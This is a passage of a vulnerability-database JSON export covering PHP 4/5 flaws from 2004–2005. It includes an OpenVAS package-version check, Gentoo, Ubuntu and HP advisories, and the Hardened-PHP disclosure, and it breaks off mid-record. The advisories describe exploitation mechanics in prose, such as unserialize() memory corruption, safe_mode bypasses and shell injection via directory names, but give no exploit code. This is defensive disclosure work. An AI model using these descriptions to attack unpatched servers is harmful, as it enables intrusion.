"sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities were found and fixed in PHP, ranging from an\ninformation leak and a safe_mode restriction bypass to a potential remote\nexecution of arbitrary code.\";\ntag_solution = \"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/php-4.3.10'\n\nAll mod_php users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/mod_php-4.3.10'\n\nAll php-cgi users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/php-cgi-4.3.10'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200412-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=74547\nhttp://www.php.net/release_4_3_10.php\nhttp://www.hardened-php.net/advisories/012004.txt\nhttp://www.securityfocus.com/archive/1/384663/2004-12-15/2004-12-21/0\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200412-14.\";\n\n \n\nif(description)\n{\n script_id(54773);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200412-14 (PHP)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-php/php\", unaffected: make_list(\"ge 4.3.10\"), vulnerable: make_list(\"lt 4.3.10\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/mod_php\", unaffected: make_list(\"ge 4.3.10\"), vulnerable: make_list(\"lt 4.3.10\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/php-cgi\", unaffected: make_list(\"ge 4.3.10\"), vulnerable: make_list(\"lt 4.3.10\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:09", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390"], "description": "### Background\n\nPHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version and also stand-alone in a CLI. \n\n### Description\n\nMultiple vulnerabilities have been found and fixed in PHP: \n\n * a possible $GLOBALS variable overwrite problem through file upload handling, extract() and import_request_variables() (CVE-2005-3390)\n * a local Denial of Service through the use of the session.save_path option (CVE-2005-3319)\n * an issue with trailing slashes in allowed basedirs (CVE-2005-3054)\n * an issue with calling virtual() on Apache 2, allowing to bypass safe_mode and open_basedir restrictions (CVE-2005-3392)\n * a problem when a request was terminated due to memory_limit constraints during certain parse_str() calls (CVE-2005-3389)\n * The curl and gd modules allowed to bypass the safe mode open_basedir restrictions (CVE-2005-3391)\n * a cross-site scripting (XSS) vulnerability in phpinfo() (CVE-2005-3388)\n\n### Impact\n\nAttackers could leverage these issues to exploit applications that are assumed to be secure through the use of proper register_globals, safe_mode or open_basedir parameters. Remote attackers could also conduct cross-site scripting attacks if a page calling phpinfo() was available. Finally, a local attacker could cause a local Denial of Service using malicious session.save_path options. \n\n### Workaround\n\nThere is no known workaround that would solve all issues at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php\n\nAll mod_php users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/mod_php\n\nAll php-cgi users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php-cgi", "edition": 1, "modified": "2005-11-13T00:00:00", "published": "2005-11-13T00:00:00", "id": "GLSA-200511-08", "href": "https://security.gentoo.org/glsa/200511-08", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1065", "CVE-2004-1020", "CVE-2004-1063", "CVE-2004-1019", "CVE-2004-1064"], "description": "### Background\n\nPHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI. \n\n### Description\n\nStefan Esser and Marcus Boerger reported several different issues in the unserialize() function, including serious exploitable bugs in the way it handles negative references (CAN-2004-1019). \n\nStefan Esser also discovered that the pack() and unpack() functions are subject to integer overflows that can lead to a heap buffer overflow and a heap information leak. Finally, he found that the way multithreaded PHP handles safe_mode_exec_dir restrictions can be bypassed, and that various path truncation issues also allow to bypass path and safe_mode restrictions. \n\nIlia Alshanetsky found a stack overflow issue in the exif_read_data() function (CAN-2004-1065). Finally, Daniel Fabian found that addslashes and magic_quotes_gpc do not properly escape null characters and that magic_quotes_gpc contains a bug that could lead to one level directory traversal. \n\n### Impact\n\nThese issues could be exploited by a remote attacker to retrieve web server heap information, bypass safe_mode or path restrictions and potentially execute arbitrary code with the rights of the web server running a PHP application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/php-4.3.10\"\n\nAll mod_php users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/mod_php-4.3.10\"\n\nAll php-cgi users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/php-cgi-4.3.10\"", "edition": 1, "modified": "2006-05-22T00:00:00", "published": "2004-12-19T00:00:00", "id": "GLSA-200412-14", "href": "https://security.gentoo.org/glsa/200412-14", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T19:34:21", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "Eric Romang discovered a local Denial of Service vulnerability in the \nhandling of the 'session.save_path' parameter in PHP's Apache 2.0 \nmodule. By setting this parameter to an invalid value in an .htaccess \nfile, a local user could crash the Apache server. (CVE-2005-3319)\n\nA Denial of Service flaw was found in the EXIF module. By sending an \nimage with specially crafted EXIF data to a PHP program that \nautomatically evaluates them (e. g. a web gallery), a remote attacker \ncould cause an infinite recursion in the PHP interpreter, which caused \nthe web server to crash. (CVE-2005-3353)\n\nStefan Esser reported a Cross Site Scripting vulnerability in the \nphpinfo() function. By tricking a user into retrieving a specially \ncrafted URL to a PHP page that exposes phpinfo(), a remote attacker \ncould inject arbitrary HTML or web script into the output page and \npossibly steal private data like cookies or session identifiers. \n(CVE-2005-3388)\n\nStefan Esser discovered a vulnerability of the parse_str() function \nwhen it is called with just one argument. By calling such programs \nwith specially crafted parameters, a remote attacker could enable the \n'register_globals' option which is normally turned off for security \nreasons. Once this option is enabled, the remote attacker could \nexploit other security flaws of PHP programs which are normally \nprotected by 'register_globals' being deactivated. (CVE-2005-3389)\n\nStefan Esser discovered that a remote attacker could overwrite the \n$GLOBALS array in PHP programs that allow file uploads and run with \n'register_globals' enabled. Depending on the particular application, \nthis can lead to unexpected vulnerabilities. (CVE-2005-3390)\n\nThe 'gd' image processing and cURL modules did not properly check \nprocessed file names against the 'open_basedir' and 'safe_mode' \nrestrictions, which could be exploited to circumvent these \nlimitations. (CVE-2005-3391)\n\nAnother bypass of the 'open_basedir' and 'safe_mode' restrictions was \nfound in virtual() function. A local attacker could exploit this to \ncircumvent these restrictions with specially crafted PHP INI files \nwhen virtual Apache 2.0 hosts are used. (CVE-2005-3392)\n\nThe mb_send_mail() function did not properly check its arguments for \ninvalid embedded line breaks. By setting the 'To:' field of an email \nto a specially crafted value in a PHP web mail application, a remote \nattacker could inject arbitrary headers into the sent email. \n(CVE-2005-3883)", "edition": 5, "modified": "2005-12-23T00:00:00", "published": "2005-12-23T00:00:00", "id": "USN-232-1", "href": "https://ubuntu.com/security/notices/USN-232-1", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T17:36:38", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1065", "CVE-2004-1019"], "description": "Stefan Esser reported several buffer overflows in PHP's variable unserializing \nhandling. These could allow an attacker to execute arbitrary code on the server \nwith the PHP interpreter's privileges by sending specially crafted input \nstrings (form data, cookie values, and similar).\n\nAdditionally, Ilia Alshanetsky discovered a buffer overflow in the \nexif_read_data() function. Attackers could execute arbitrary code on the server \nby sending a JPEG image with a very long \"sectionname\" value to PHP \napplications that support image uploads.", "edition": 5, "modified": "2004-12-17T00:00:00", "published": "2004-12-17T00:00:00", "id": "USN-40-1", "href": "https://ubuntu.com/security/notices/USN-40-1", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-2491"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c00786522\r\nVersion: 1\r\n\r\nHPSBMA02159 SSRT061238 rev.1 - HP System Management Homepage (SMH), Remote Bypassing of Security Features or Cross Site Scripting or Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2006-11-01\r\nLast Updated: 2006-11-01\r\n\r\nPotential Security Impact: Remote security bypass or cross site scripting or Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified in PHP, an open source software component supplied with HP System Management Homepage (SMH). These vulnerabilities could by exploited remotely resulting in the bypassing of security features, cross site scripting, or Denial of Service (DoS).\r\n\r\nReferences: CVE-2005-2491, CVE-2005-3319, CVE-2005-3353, CVE-2005-3388, CVE-2005-3389, CVE-2005-3390, CVE-2005-3391, CVE-2005-3392\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP System Management Homepage (SMH) versions prior to 2.1.5 running on Linux and Windows.\r\n\r\nBACKGROUND\r\n\r\nRESOLUTION\r\n\r\nHP has provided System Management Homepage (SMH) version 2.1.5 or subsequent for each platform to resolve this issue.\r\n\r\nHP System Management Homepage for Linux (x86) version 2.1.5-146 can be downloaded from\r\nhttp://h18023.www1.hp.com/support/files/server/us/download/24193.html\r\n\r\nHP System Management Homepage for Linux (AMD64/EM64T) version 2.1.5-146 can be downloaded from\r\nhttp://h18023.www1.hp.com/support/files/server/us/download/24172.html\r\n\r\nHP System Management Homepage for Windows version 2.1.5-146 can be downloaded from\r\nhttp://h18007.www1.hp.com/support/files/server/us/download/23883.html\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHISTORY:\r\nVersion:1 (rev.1) - 1 November 2006 Initial Release\r\n\r\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n - check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n - verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\n\u00a9Copyright 2006 Hewlett-Packard Development Company, L.P.\r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBRUngl+AfOvwtKn1ZEQJI1ACghtQW/CXAVNRAxIC/WF3Y0xky2IIAoMN7\r\nFrK+8N5WxaHjk6DRS1Kw/q/Q\r\n=GCt9\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-11-03T00:00:00", "published": "2006-11-03T00:00:00", "id": "SECURITYVULNS:DOC:14915", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14915", "title": "[security bulletin] HPSBMA02159 SSRT061238 rev.1 - HP System Management Homepage (SMH), Remote Bypassing of Security Features or Cross Site Scripting or Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "description": "Use-after-free in unserialize()", "edition": 1, "modified": "2014-12-23T00:00:00", "published": "2014-12-23T00:00:00", "id": "SECURITYVULNS:VULN:14172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14172", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-3388", "CVE-2007-1287"], "description": "Buffer overflows, integer overflows, DoS conditions, crossite scripting.", "edition": 1, "modified": "2007-03-04T00:00:00", "published": "2007-03-04T00:00:00", "id": "SECURITYVULNS:VULN:1818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:1818", "title": "Multiple PHP bugs", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "cvelist": ["CVE-2004-1018", "CVE-2004-1063", "CVE-2004-1019", "CVE-2004-1064"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Hardened-PHP Project\r\n www.hardened-php.net\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: Multiple vulnerabilities within PHP 4/5\r\n Release Date: 2004/12/15\r\nLast Modified: 2004/12/15\r\n Author: Stefan Esser [sesser@php.net]\r\n\r\n Application: PHP4 <= 4.3.9\r\n PHP5 <= 5.0.2\r\n Severity: Several vulnerabilities within PHP allow \r\n local and remote execution of arbitrary code\r\n Risk: Critical\r\nVendor Status: Vendor has released bugfixed versions.\r\n References: http://www.hardened-php.net/advisories/012004.txt\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n During the development of Hardened-PHP which adds security hardening\r\n features to the PHP codebase, several vulnerabilities within PHP \r\n were discovered that reach from bufferoverflows, over information \r\n leak vulnerabilities and path truncation vulnerabilities to\r\n safe_mode restriction bypass vulnerabilities.\r\n \r\n\r\nDetails:\r\n\r\n [01 - pack() - integer overflow leading to heap bufferoverflow ]\r\n \r\n Insufficient validation of the parameters passed to pack() can\r\n lead to a heap overflow which can be used to execute arbitrary\r\n code from within a PHP script. This enables an attacker to\r\n bypass safe_mode restrictions and execute arbitrary code with\r\n the permissions of the webserver. Due to the nature of this\r\n function it is unlikely that a script accidently exposes it to\r\n remote attackers.\r\n \r\n [02 - unpack() - integer overflow leading to heap info leak ]\r\n\r\n Insufficient validation of the parameters passed to unpack() can\r\n lead to a heap information leak which can be used to retrieve\r\n secret data from the apache process. Additionally a skilled\r\n local attacker could use this vulnerability in combination with\r\n 01 to bypass heap canary protection systems. Similiar to 01 this\r\n function is usually not used on user supplied data within\r\n webapplications.\r\n\r\n [03 - safe_mode_exec_dir bypass in multithreaded PHP ]\r\n \r\n When safe_mode is activated within PHP, it is only allowed to\r\n execute commands within the configured safe_mode_exec_dir. \r\n Unfourtunately PHP does prepend a "cd [currentdir] ;" to any\r\n executed command when a PHP is running on a multithreaded unix\r\n webserver (f.e. some installations of Apache2). Because the name\r\n of the current directory is prepended directly a local attacker\r\n may bypass safe_mode_exec_dir restrictions by injecting shell-\r\n commands into the current directory name.\r\n \r\n [04 - safe_mode bypass through path truncation ]\r\n \r\n The safe_mode checks silently truncated the file path at MAXPATHLEN\r\n bytes before passing it to realpath(). In combination with certain\r\n malfunctional implementations of realpath() f.e. within glibc this\r\n allows crafting a filepath that pass the safe_mode check although\r\n it points to a file that should fail the safe_mode check.\r\n \r\n [05 - path truncation in realpath() ]\r\n \r\n PHP uses realpath() within several places to get the real path\r\n of files. Unfourtunately some implementations of realpath() silently\r\n truncate overlong filenames (f.e. OpenBSD, and older NetBSD/FreeBSD)\r\n This can lead to arbitrary file include vulnerabilities if something\r\n like "include "modules/$userinput/config.inc.php"; is used on such\r\n systems.\r\n \r\n [06 - unserialize() - wrong handling of negative references ]\r\n \r\n The variable unserializer could be fooled with negative references\r\n to add false zvalues to hashtables. When those hashtables get\r\n destroyed this can lead to efree()s of arbitrary memory addresses\r\n which can result in arbitrary code execution. (Unless Hardened-PHP's\r\n memory manager canaries are activated)\r\n \r\n [07 - unserialize() - wrong handling of references to freed data ]\r\n \r\n Additionally to bug 07 the previous version of the variable \r\n unserializer allowed setting references to already freed entries in\r\n the variable hash. A skilled attacker can exploit this to create \r\n an universal string that will pass execution to an arbitrary \r\n memory address when it is passed to unserialize(). For AMD64 systems\r\n a string was developed that directly passes execution to code \r\n contained in the string itself.\r\n \r\n It is necessary to understand that these strings can exploit a \r\n bunch of popular PHP applications remotely because they pass f.e.\r\n cookie content to unserialize().\r\n \r\n Examples of vulnerable scripts:\r\n \r\n - phpBB2\r\n - Invision Board\r\n - vBulletin\r\n - Woltlab Burning Board 2.x\r\n - Serendipity Weblog\r\n - phpAds(New)\r\n - ...\r\n\r\n\r\nProof of Concept:\r\n\r\n The Hardened-PHP project is not going to release exploits for any \r\n of these vulnerabilities to the public.\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-1018 to issues 01, 02, the name \r\n CAN-2004-1019 to issues 06, 07, the name CAN-2004-1063 to issue 03\r\n and the name CAN-2004-1064 to issues 04, 05.\r\n\r\n\r\nRecommendation:\r\n\r\n It is strongly recommended to upgrade to the new PHP-Releases as\r\n soon as possible, because a lot of PHP applications expose the\r\n easy to exploit unserialize() vulnerability to remote attackers.\r\n Additionally we always recommend to run PHP with the Hardened-PHP\r\n patch applied.\r\n \r\n\r\nGPG-Key:\r\n\r\n http://www.hardened-php.net/hardened-php-signature-key.asc\r\n\r\n pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key\r\n Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFBwDo7RDkUzAqGSqERAgVxAKC0LnTE49y5HFjeXpwXrZmAjuCL8gCgpQUl\r\nrtmmBfJ3iv9Ksb/xtnyflD0=\r\n=lzXX\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2004-12-16T00:00:00", "published": "2004-12-16T00:00:00", "id": "SECURITYVULNS:DOC:7349", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7349", "title": "Advisory 01/2004: Multiple vulnerabilities in PHP 4/5", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3390"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2005/0062/)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-037.htm)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\nSecurity Tracker: 1015129\n[Secunia Advisory ID:17666](https://secuniaresearch.flexerasoftware.com/advisories/17666/)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:18669](https://secuniaresearch.flexerasoftware.com/advisories/18669/)\n[Secunia Advisory ID:17371](https://secuniaresearch.flexerasoftware.com/advisories/17371/)\n[Secunia Advisory ID:17490](https://secuniaresearch.flexerasoftware.com/advisories/17490/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:17510](https://secuniaresearch.flexerasoftware.com/advisories/17510/)\n[Secunia Advisory ID:21252](https://secuniaresearch.flexerasoftware.com/advisories/21252/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18054](https://secuniaresearch.flexerasoftware.com/advisories/18054/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\n[Related OSVDB ID: 20407](https://vulners.com/osvdb/OSVDB:20407)\n[Related OSVDB ID: 20406](https://vulners.com/osvdb/OSVDB:20406)\nRedHat RHSA: RHSA-2006:0549\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0005.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-08.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://www.hardened-php.net/advisory_202005.79.html\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0647.html\nKeyword: HPSBMA02159,SSRT061238\n[CVE-2005-3390](https://vulners.com/cve/CVE-2005-3390)\nBugtraq ID: 15250\n", "modified": "2005-10-31T14:12:43", "published": "2005-10-31T14:12:43", "href": "https://vulners.com/osvdb/OSVDB:20408", "id": "OSVDB:20408", "type": "osvdb", "title": "PHP File-Upload $GLOBALS Array Overwrite", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2004-1019"], "edition": 1, "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the deserialization code not properly sanitizing user-supplied input. This may allow an attacker to pass crafted content to the unserialize function and cause a denial of service or execute arbitrary code.\n## Solution Description\nUpgrade to version 4.3.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the deserialization code not properly sanitizing user-supplied input. This may allow an attacker to pass crafted content to the unserialize function and cause a denial of service or execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_3_10.php\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01212)\n[Secunia Advisory ID:13481](https://secuniaresearch.flexerasoftware.com/advisories/13481/)\n[Secunia Advisory ID:13851](https://secuniaresearch.flexerasoftware.com/advisories/13851/)\n[Secunia Advisory ID:13923](https://secuniaresearch.flexerasoftware.com/advisories/13923/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:13562](https://secuniaresearch.flexerasoftware.com/advisories/13562/)\n[Secunia Advisory ID:13944](https://secuniaresearch.flexerasoftware.com/advisories/13944/)\n[Secunia Advisory ID:16322](https://secuniaresearch.flexerasoftware.com/advisories/16322/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:13568](https://secuniaresearch.flexerasoftware.com/advisories/13568/)\n[Secunia Advisory ID:13611](https://secuniaresearch.flexerasoftware.com/advisories/13611/)\n[Secunia Advisory ID:13895](https://secuniaresearch.flexerasoftware.com/advisories/13895/)\n[Related OSVDB ID: 12411](https://vulners.com/osvdb/OSVDB:12411)\n[Related OSVDB ID: 12410](https://vulners.com/osvdb/OSVDB:12410)\n[Related OSVDB ID: 12412](https://vulners.com/osvdb/OSVDB:12412)\n[Related OSVDB ID: 12413](https://vulners.com/osvdb/OSVDB:12413)\n[Related OSVDB ID: 